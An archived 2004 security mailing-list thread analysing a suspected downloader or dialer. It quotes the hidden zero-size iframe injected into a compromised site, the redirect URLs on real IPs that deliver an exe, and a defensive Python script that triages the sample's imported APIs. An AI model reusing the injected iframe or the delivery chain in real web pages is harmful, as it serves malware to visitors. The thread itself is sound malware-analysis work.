RE: [Full-Disclosure] Possible dialer on 62.4.84.150

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukh_at_online.gateway.technolabs.net)
Date: 08/21/04

  • Next message: michael williamson: "Re: [Full-Disclosure] The 'good worm' from HP"
    To: "Daniel Bartlett" <danbuk_fd@warpmail.net>, "Full Disclosure" <full-disclosure@lists.netsys.com>
    Date: Sat, 21 Aug 2004 17:56:27 +0530
    
    

    KERNEL32.DLL
    0000 LoadLibraryA
    0000 GetProcAddress
    0000 ExitProcess

    advapi32.dll
    0000 RegCloseKey

    oleaut32.dll
    0000 SysFreeString

    shell32.dll
    0000 ShellExecuteA

    user32.dll
    0000 SetTimer

    All these exports point in a direction that suggests it creates a key in the registry for autoloading on reboot and executes an executable; possibly this is a downloader that downloads some other program from somewhere which I have not been able to find yet!

    -aditya

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com]On Behalf Of Daniel
    Bartlett
    Sent: Wednesday, August 18, 2004 12:17 AM
    To: Full Disclosure
    Subject: [Full-Disclosure] Possible dialer on 62.4.84.150

    Hi All,
    I've only looked at this for about 3 mins, so there isn't a lot to tell.
    From a website that looks like someone has hacked it and added an IFRAME
    to the top of the page:
    <iframe FRAMEBORDER="0" width="0" height="0"
    src="http://213.158.119.103/iframe.php?xid=111"></iframe>
    From this frame it gets bounced onto:
    http://62.4.84.150/data/start.php?id=111-b&aid=0
    then onto:
    http://62.4.84.150/data/start.php?id=111-download&aid=0
    which then downloads a 17984b exe file.
    I've attached a strings output from the exe, and a copy of the
    exe (the password for the zip is lamedial).

    I hope someone else can shed more light on this than I can.

    Cheers,
    Daniel B.

    -- 
      Daniel Bartlett
      danbuk_fd@warpmail.net
    ________________________________________________________________________
    Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
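The reasoning in the reply above (reading a binary's imported APIs as hints about its behaviour) is a standard first triage step. The following is an added example, not code from the thread: it parses an import listing in the same "DLL header, then `<hint> <name>` lines" layout quoted above, maps each API to a coarse capability from a small hand-picked table (the table and the `SAMPLE_LISTING` are constructed for this example), and applies the caveat a practitioner wants here: a tiny import table that contains `LoadLibraryA` plus `GetProcAddress` is only a lower bound, because the sample can resolve any further API (registry writes, URL downloads, process creation) at run time, so the absence of those names from the static list proves nothing.

```python
"""Classify a Windows PE import listing into behavioural capabilities and
flag when the static list is probably incomplete (run-time API resolution).

Added example for the thread above; the capability table is a small,
hand-picked mapping and the sample listing is constructed from the
imports quoted in the reply."""
import re
from collections import defaultdict

# Constructed sample: the import listing quoted in the reply above.
SAMPLE_LISTING = """\
KERNEL32.DLL
0000 LoadLibraryA
0000 GetProcAddress
0000 ExitProcess

advapi32.dll
0000 RegCloseKey

oleaut32.dll
0000 SysFreeString

shell32.dll
0000 ShellExecuteA

user32.dll
0000 SetTimer
"""

# API name -> coarse capability. Hypothetical, hand-picked table for this
# example; a real triage tool would use a much larger mapping.
CAPABILITIES = {
    "LoadLibraryA": "dynamic API resolution",
    "LoadLibraryW": "dynamic API resolution",
    "GetProcAddress": "dynamic API resolution",
    "RegCloseKey": "registry access",
    "RegOpenKeyExA": "registry access",
    "RegSetValueExA": "registry write (possible autorun persistence)",
    "RegCreateKeyExA": "registry write (possible autorun persistence)",
    "ShellExecuteA": "launches programs or URLs",
    "WinExec": "launches programs",
    "CreateProcessA": "launches programs",
    "URLDownloadToFileA": "downloads files",
    "InternetOpenUrlA": "network download",
    "SetTimer": "timer callback (delayed action)",
}

DLL_LINE = re.compile(r"^\s*([\w.-]+\.dll)\s*$", re.IGNORECASE)
IMPORT_LINE = re.compile(r"^\s*([0-9A-Fa-f]{4})\s+(\w+)\s*$")


def parse_imports(listing):
    """Return {dll_name_lowercase: [function names]} from a dump-style listing.

    A DLL header line starts a new group; each following '<hint> <name>'
    line is attached to the current group. Blank and unrecognised lines
    are skipped."""
    imports = defaultdict(list)
    current = None
    for line in listing.splitlines():
        if not line.strip():
            continue
        m = DLL_LINE.match(line)
        if m:
            current = m.group(1).lower()
            continue
        m = IMPORT_LINE.match(line)
        if m and current is not None:
            imports[current].append(m.group(2))
    return dict(imports)


def assess(imports):
    """Map imports to capabilities and judge whether the static view is complete."""
    caps = {}
    for dll, funcs in imports.items():
        for func in funcs:
            if func in CAPABILITIES:
                caps.setdefault(CAPABILITIES[func], []).append(f"{dll}!{func}")
    all_funcs = {f for funcs in imports.values() for f in funcs}
    # LoadLibrary + GetProcAddress: the binary can fetch any API by name at
    # run time, so the import table is a lower bound on its real behaviour.
    runtime_resolution = (bool(all_funcs & {"LoadLibraryA", "LoadLibraryW"})
                          and "GetProcAddress" in all_funcs)
    return {
        "import_count": len(all_funcs),
        "capabilities": caps,
        "runtime_resolution": runtime_resolution,
        "note": ("static import list is a lower bound; expect further APIs "
                 "resolved at run time" if runtime_resolution
                 else "import list is probably representative"),
    }


def triage(listing):
    """Parse and assess a listing in one step."""
    return assess(parse_imports(listing))


if __name__ == "__main__":
    report = triage(SAMPLE_LISTING)
    print(f"{report['import_count']} imports, run-time resolution: "
          f"{report['runtime_resolution']}")
    for cap, names in sorted(report["capabilities"].items()):
        print(f"  {cap}: {', '.join(names)}")
    print(report["note"])
```

On the quoted listing this reports seven imports, the capabilities "dynamic API resolution", "registry access", "launches programs or URLs" and "timer callback", and flags run-time resolution, which is why the handful of visible names cannot settle what the sample actually writes or downloads.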
    
